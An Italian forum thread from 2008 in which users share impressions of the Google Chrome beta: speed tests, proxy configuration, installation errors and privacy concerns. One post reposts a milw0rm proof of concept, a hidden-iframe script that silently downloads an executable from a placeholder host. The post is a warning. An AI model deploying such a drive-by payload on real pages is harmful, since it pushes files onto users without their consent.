Torna indietro   Hardware Upgrade Forum > Software > Programmi e Utility

DJI Mavic 4 Pro: sblocca un nuovo livello per le riprese aeree
DJI Mavic 4 Pro: sblocca un nuovo livello per le riprese aeree
DJI Mavic 4 Pro porta in dote il nuovo Stabilizzatore Infinity a 360°, che permette nuovi gradi di libertà nelle riprese aeree. Non solo può ruotare a 360 gradi, ma abilita anche riprese dal basso, con inclinazione della videocamera fino a 70°. Il triplo modulo di ripresa offre una fotocamera Hasselblad 28mm con sensore da 100 megapixel e video 6K, ma si spinge fino al teleobiettivo da 50 megapixel e 168mm di focale equivalente. Nuova avionica e batteria per voli fino a 51 minuti di autonomia. La nostra prova
Idrogeno verde in Europa: nuovi studi prevedono costi ben superiori alle aspettative
Idrogeno verde in Europa: nuovi studi prevedono costi ben superiori alle aspettative
Siamo tutti d'accordo: una eventuale diffusione massiccia di idrogeno verde, prodotto esclusivamente da fonti rinnovabili, risolverebbe tanti problemi. Ma siamo ancora lontanissimi da uno scenario del genere e c'entra anche l'Africa. Facciamo il punto della situazione sulla base di studi autorevoli, recentemente pubblicati.
Mario Kart World lancia Switch 2: la magia Nintendo ora in 4K
Mario Kart World lancia Switch 2: la magia Nintendo ora in 4K
Abbiamo provato esaustivamente due dei titoli di lancio della nuova console di Nintendo, il cui debutto è previsto per la settimana in corso. Mario Kart World e Nintendo Switch 2 Welcome Tour si rivelano sorprendenti per certi aspetti e anche perché esaltano alcune delle nuove caratteristiche di Switch 2
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi

Strumenti
Old 03-09-2008, 18:27   #181
conan_75
Senior Member

Iscritto dal: Sep 2002
Città: Cagliari
Quote:
Originariamente inviato da Antares88 Guarda i messaggi
E qui sbagli, e sbagli di grosso. Quello che importa è che molti siti si basano sulla pubblicità per vivere, ad esempio il qui presente hardware upgrade su cui stai postando.
Sono siti che ti offrono servizi e contenuti gratuiti in cambio del fatto che tu visualizzi un pò di pubblicità. Se tu non la visualizzi, stai approfittando di loro e sei dalla parte del torto.
Estensioni come AdBlock vanno usate per bloccare la pubblicità su siti che la usano in modo improprio e immotivato. Anche bloccando analytics fai un danno a molti siti.
Non mi sento in torto, semplicemente ripago la banda offertami con una partecipazione attiva alla community.
Comunque non mi pare attinente alla discussione che parla di velocità pura di navigazione.
Sul fatto che sia lecito o immorale si può aprire un'altra discussione a cui parteciperei volentieri.
conan_75 è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 18:29   #182
Rand
Senior Member

Iscritto dal: Apr 2006
Quote:
Originariamente inviato da conan_75 Guarda i messaggi
Parliamo di una beta, quindi è logico attendersi questi inghippi, però mancano cose essenziali...a mio avviso è più alpha di beta.
Oppure vogliono fare una cosa proprio facile da usare senza impostazioni...e a quel punto semplicemente non è un browser adatto a me.
Una mia ipotesi è che lo tengano semplice per andare a togliere mercato ad IE più che a Firefox.

L'alternativa è che abbiano rilasciato una versione "semplice", per poi arricchirla nel corso dello sviluppo (una politica intelligente tra l'altro).

(Ti ho risposto nella pagina prima per i test )
Rand è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 18:31   #183
deck
Senior Member

Iscritto dal: Apr 2001
Per quel che può valere...

ecco il test sunSpider per Chrome, Mozilla 3.0.1 e IE6 (NON 7)
che misura la velocità del javascript. Da notare che il test per IE è stato notevolmente peggiorato dalla parte di manipolazione stringhe...

Tagan 580 U22 - Asus P5B deluxe WiFi AP - Conroe E6600 - ThermalRight XP90-c - TeamGroup DDR2 800 2x1GB - WD Raptor 36gb + 2 x Seagate Barracuda 320gb - Sapphire 4850x2 2GB - CoolerMaster Stacker - Monitor Philips 22W Laptop: Dell Vostro Ho fatto affari con alby.to, melchizedek
deck è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 18:38   #184
Rand
Senior Member

Iscritto dal: Apr 2006
Manca il link all'immagine grossa. (Edit: lo hai aggiunto)

Comunque:

(V8, Tracemonkey e Squirrelfish sono circa 5 volte più veloci del motore di IE 8 beta 2 )
Rand è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 18:40   #185
generals
Senior Member

L'Avatar di generals

Iscritto dal: Jan 2004
Città: Napoli@Roma
ma si può cambiare il colore dello sfondo delle pagine web come con FF?
Old 03-09-2008, 19:05   #186
zuper
Senior Member

Iscritto dal: Mar 2001
Città: PV Milano Nord
Quote:
Originariamente inviato da fulviettino Guarda i messaggi
Se siete dietro ad un proxy dovreste scaricare l'installer completo; si trova qui

http://cache.pack.google.com/chrome/..._installer.exe
no a me si installa completamente anche facendogli fare il dwlnd in automatico...

ma non riesco a fargli capire le credenziali del proxy quando è stato installato...ogni volta che lo apro devo specificagli le mie...

e non posso impostargli un proxy diverso da quello di default...
zuper è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 19:11   #187
Tummarellox
Senior Member

L'Avatar di Tummarellox

Iscritto dal: Mar 2005
installato oggi, pare veramente notevole soprattutto considerando che è una beta!
velocissimo e l'interfaccia è semplice e intuitiva e ha delle funzioni simpatiche e utili, non capisco però come fare queste cose:

come faccio a fare in modo che quando scrivo sulla barra degli indirizzi una parola ad esempio youtube o wikipedia e poi premo TAB, mi faccia fare la ricerca sul relativo sito direttamente dalla barra? Non riesco a farla funzionare
Old 03-09-2008, 19:29   #188
Mr.Thebest
Senior Member

L'Avatar di Mr.Thebest

Iscritto dal: Nov 2005
Città: Milano
E'un browser primitivo, anche se è solo una beta. Mancino una vagonata di funzioni utilissime.
Mr.Thebest è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 20:30   #189
fulviettino
Senior Member

L'Avatar di fulviettino

Iscritto dal: Jun 2003
Città: Milano Moto:Suzuki_GSR_k6
Quote:
Originariamente inviato da vegetassj2 Guarda i messaggi
Grazie per la segnalazione
Quote:
Originariamente inviato da Deskmat Guarda i messaggi
[..]
ps. qualcuno ha provato la compatibilità con i programmi dei mouse logitech? (tipo tasti avanti e indietro e simili per intenderci)
Funzionano sia con mouse microsoft che logitech

Quote:
Originariamente inviato da zuper Guarda i messaggi
no a me si installa completamente anche facendogli fare il dwlnd in automatico...
ma non riesco a fargli capire le credenziali del proxy quando è stato installato...ogni volta che lo apro devo specificagli le mie...
e non posso impostargli un proxy diverso da quello di default...
Ora non posso fare prove perchè non ho il proxy in ogni caso ho installato il browser su un pc a lavoro (dove c'è il proxy) utilizzando l'installer completo ed ha funzionato subito probabilmente importando le impostazioni da firefox.

PS: ora aggiorno il primo post con alcuni link che avete postato
Old 03-09-2008, 21:20   #190
fulviettino
Senior Member

L'Avatar di fulviettino

Altra comparativa
http://lifehacker.com/5044668/beta-b...ich-is-fastest

Ultima modifica di fulviettino : 03-09-2008 alle 21:47.
fulviettino è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 21:27   #191
xciaoatuttix
Member

L'Avatar di xciaoatuttix

Iscritto dal: Jul 2008
Ho installato chrome ieri e vi diro' le miei impressioni:

mi piace l'interfaccia, il debugger javascript e il task manager.
appena l ho installato si è aggiunto da solo i preferiti di firefox e che cavolo, poi sono andato in un sito delle poste 'phishato' e NON me l'ha segnalato al contrario di firefox e explorer. vabeh che è in una versione beta.

io pero' non lo usero' mai... basta con questo google che vuole imporsi in tutti i campi mi ha veramente rotto .
inoltre vi consiglio di leggere le 3 clausole in fase di installazione.. anzi le riporto qui:

La prima dice che Google si e' riservata il diritto di installare sul tuo PC il servizio GoogleUpdate.exe e che puo' aggiornare automaticamente Chrome come e quando vuole Google, tu come utente non hai diritto di disattivare il servizio di update.

La seconda clausola dice che tu utente che usi Chrome concedi a Google il diritto di fare quello che vuole con il contenuto delle pagine web che visiti con Chrome. Qualunque cosa venga visualizzata da Chrome (anche le email della tua webmail) diventa materiale che Google puo' usare a proprio piacimento.

La terza clausola dice che alcuni dei servizi legati a Chrome mostrano pubblicita' che viene scelta in base a certi criteri e che i criteri e le modalita' di visualizzazione della pubblicita' sono soggetti a cambiamenti senza che questo richieda che l'utente venga informato a riguardo.

La mia impressione e' che Chrome non sia stato creato per dare un impulso al Web, per evolverlo, ma semplicemente perche' se l'utente usa altri browser Google non ha modo di profilare l'utente.
Google ha prima provato a "introdursi" nei PC degli utenti con Google Desktop, ma la cosa non ha avuto il successo sperato, ha quindi dovuto correre ai ripari con un approccio piu' drastico: cercare di prendere il posto dei vari IE, Firefox, Safari etc.
in questo modo Google puo' garantirsi che gli utenti non installino sui propri browser gli AdSense block (le estensioni che bloccano la visualizzazione delle pubblicita' sui siti) oltre al fatto di poter raccogliere molte piu' informazioni sull'utente stesso allo scopo di presentagli pubblicita' estremamente mirata.

ormai google non è solo un motore di ricerca ma è anche sinonimo di pubblicita' e antiprivacy

tutto imho ovviamente

Ultima modifica di xciaoatuttix : 03-09-2008 alle 21:29.
xciaoatuttix è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 21:53   #192
Antares88
Senior Member

L'Avatar di Antares88

Iscritto dal: Jan 2003
Città: Roma
Quote:
Originariamente inviato da Rand Guarda i messaggi
In futuro nulla vieta a FF e Opera di evolvere i loro motori di rendering/architettura (cosa che Mozilla aveva già in programma, vedi Mozilla 2).
Certo, ma ci sono delle caratteristiche strutturali che non si possono modificare, bisognerebbe rifare il motore da zero con un design nuovo e una serie di scelte diverse.

E' come una automobile: puoi intervenire su un sacco di parti e migliorare tantissimo, ma il pianale rimane quello, vincolando tutto il resto.
Old 03-09-2008, 22:03   #193
Alessio.16390
Senior Member

Iscritto dal: Oct 2005
Città: Roseto Degli Abruzzi
Occhio a navigare su siti poco raccomandati con Chrome.

Codice:
 Author: nerex
 E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
 downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.
 Use the code it at your own risk.
 The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]
Alessio.16390 è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 22:15   #194
steus
Member

L'Avatar di steus

Iscritto dal: Aug 2003
cacchio a me non ne vuole sapere di funzuionare...
mi da subito appena lo lancio "errore nell'inizializzazione dell'applicazione"

e poi non mi fa navigare.

già reinstallato, ma nada...

iniziamo bene
Linux user #296521
steus è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 22:21   #195
zuper
Senior Member

Quote:
Ora non posso fare prove perchè non ho il proxy in ogni caso ho installato il browser su un pc a lavoro (dove c'è il proxy) utilizzando l'installer completo ed ha funzionato subito probabilmente importando le impostazioni da firefox.
ma il tuo proxy richiede autenticazione?

non potevano mettere un pannello per la config del proxy? io non voglio importare niente da altri programmi ma essere libero di decidere che proxy impostare...
Old 03-09-2008, 22:27   #196
zuper
Senior Member

http://www.google.com/support/chrome...y&topic=&type=

qui dice che usa le stesse impostazioni di windows...

per ora decade il mio uso di chrome...dato che non mi va di usare 2 browser diversi tra casa e lavoro....e al lavoro non voglio tenerlo impostato col proxy pac che ho di default su windows dato che mi serve su ie per alcuni siti aziendali...

e comunque senza qualcosa di simile a adblockplus non ne vale la pena....

sinceramente ho sempre apprezzato i prodotti google..ma su questo potevano impegnarsi di +...

ok mi direte voi...è solo la beta...ma la prima impressione è quella che conta...e la prima volta che usai firefox ne rimasi subito impressionato
Old 03-09-2008, 22:31   #197
fulviettino
Senior Member

L'Avatar di fulviettino

Quote:
Originariamente inviato da zuper Guarda i messaggi
ma il tuo proxy richiede autenticazione?

non potevano mettere un pannello per la config del proxy? io non voglio importare niente da altri programmi ma essere libero di decidere che proxy impostare...
Si si il proxy richiedeva l'autenticazione infatti appena ho aperto il browser mi si è aperta anche una piccola finestra con i campi user e password da completare.
Effettivamente il pannello di configurazione del proxy è assente e, come dicevamo prima, si appoggia a windows
Old 03-09-2008, 22:32   #198
zuper
Senior Member

Quote:
Si si il proxy richiedeva l'autenticazione infatti appena ho aperto il browser mi si è aperta anche una piccola finestra con i campi user e password da completare.
Effettivamente il pannello di configurazione del proxy è assente e, come dicevamo prima, si appoggia a windows
si ma 2 "errori" così da google non me li sarei aspettati neanche nella release ALFA
Old 03-09-2008, 22:32   #199
D3stroyer
Senior Member

L'Avatar di D3stroyer

Iscritto dal: Dec 2003
l'ho messo da 2 giorni: il primo mi ha convinto, il secondo l'ho amato.

IE, per l'utilizzo che faccio di internet, non lo aprirò mai piu'.
D3stroyer è offline   Rispondi citando il messaggio o parte di esso
Old 03-09-2008, 22:34   #200
steus
Member

L'Avatar di steus

Iscritto dal: Aug 2003
questo è l'errore che da a me prima di partire:

dopo di che mi esce la pagina "uffa" e non mi fa navigare

che posso fare???
Linux user #296521
steus è offline   Rispondi citando il messaggio o parte di esso
 Rispondi

DJI Mavic 4 Pro: sblocca un nuovo livello per le riprese aeree DJI Mavic 4 Pro: sblocca un nuovo livello per le...
Idrogeno verde in Europa: nuovi studi prevedono costi ben superiori alle aspettative Idrogeno verde in Europa: nuovi studi prevedono ...
Mario Kart World lancia Switch 2: la magia Nintendo ora in 4K Mario Kart World lancia Switch 2: la magia Ninte...
La rivoluzione dei dati in tempo reale è in arrivo. Un assaggio a Confluent Current 2025 La rivoluzione dei dati in tempo reale è ...
SAP Sapphire 2025: con Joule l'intelligenza artificiale guida app, dati e decisioni SAP Sapphire 2025: con Joule l'intelligenza arti...
HP Laptop 15-fc0011sl scende ancora e or...
Lenovo PureSight: un marchio di qualit&a...
iPad con chip A16 a 349€ su Amazon: tant...
Spiare i messaggi WhatsApp è reat...
Meta Quest 3S scende a 299 euro: il viso...
Nave cargo in fiamme in Alaska con 3.000...
Apple Watch Series 10 GPS + Cellular a m...
Sony Future Filmmaker Awards: ecco i vin...
Scambio di chiavi quantistico via satell...
HONOR 400 è un successo! Forte sl...
Redmi Pad 2, i nuovi tablet Xiaomi costa...
All'aeroporto di Fiumicino il più...
HONOR 400 vs HONOR 400 Pro: tutte le dif...
Nintendo Switch 2 debutta oggi nei negoz...
Samsung Galaxy S25 Edge è disponi...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP